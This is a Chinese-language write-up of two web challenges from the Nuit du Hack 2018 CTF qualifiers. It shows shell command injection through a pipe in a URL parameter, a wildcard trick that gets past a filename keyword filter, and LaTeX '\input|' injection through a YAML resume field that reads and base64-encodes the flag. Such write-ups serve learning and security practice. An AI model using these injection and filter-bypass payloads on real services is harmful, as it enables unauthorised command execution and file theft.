您的位置: 首页  >  文章  >  Nuit du Hack CTF Quals 2018 writeup (web)

Nuit du Hack CTF Quals 2018 writeup (web)

分类: 文章 2024-06-16 17:05:46

以下是2道比较简单的web类题目
- Crawl me maybe! (100)
- Linked Out (300)

Crawl me maybe!

打开网站,看到只有一个搜索框
Nuit du Hack CTF Quals 2018 writeup (web)

测试了一下百度,得到了一堆css。查看网络请求,发现向result处post了url。通过wappalyzer分析网站是用ruby写的,这里想办法让它报错。
url[]=1
通过向url赋值一个数组的形式,让它抛异常可以得到Nuit du Hack CTF Quals 2018 writeup (web)
可以看到匹配了”flag” “txt” “*” ,且必须同时出现”|” 与”cat”或”ls”
nil和python里的None基本相同。可以猜测文件名大概是flag.txt
url=|ls -a src
Nuit du Hack CTF Quals 2018 writeup (web)

url=|cat src/.flag.txt

果然禁止访问了
Nuit du Hack CTF Quals 2018 writeup (web)
也被禁止了,我们不能用fla的方式查看。那怎么做呢?
实际有很多方式绕过,这里我选一种最简单的也是我立刻想到的

url=|cat src/.fl?g.t?t

得到Nuit du Hack CTF Quals 2018 writeup (web)

Linked Out

这道题的大概意思是通过上传一个写好的yml文件,通过latex模板生成对应的简历。是一道latex引发的命令执行问题。
这里有一篇paperhttps://0day.work/hacking-with-latex/

我们通过

skype: BBBBBBBBBBBBBB}\skype{\input|"ls /"}%

的方式覆盖原字段并闭合路径
Nuit du Hack CTF Quals 2018 writeup (web)
可以发现成功注入代码,看到了flag,那来cat一下

skype: BBBBBBBBBBBBBB}\skype{\input|"cat flag"}%

Nuit du Hack CTF Quals 2018 writeup (web)
看来得转一下码:

skype: BBBBBBBBBBBBBB}\skype{\input|"cat flag|base64 "}%

Nuit du Hack CTF Quals 2018 writeup (web)
然后base64转码得到flag

摘自https://tipi-hack.github.io/2018/04/01/quals-NDH-18-linked-out.html

相关推荐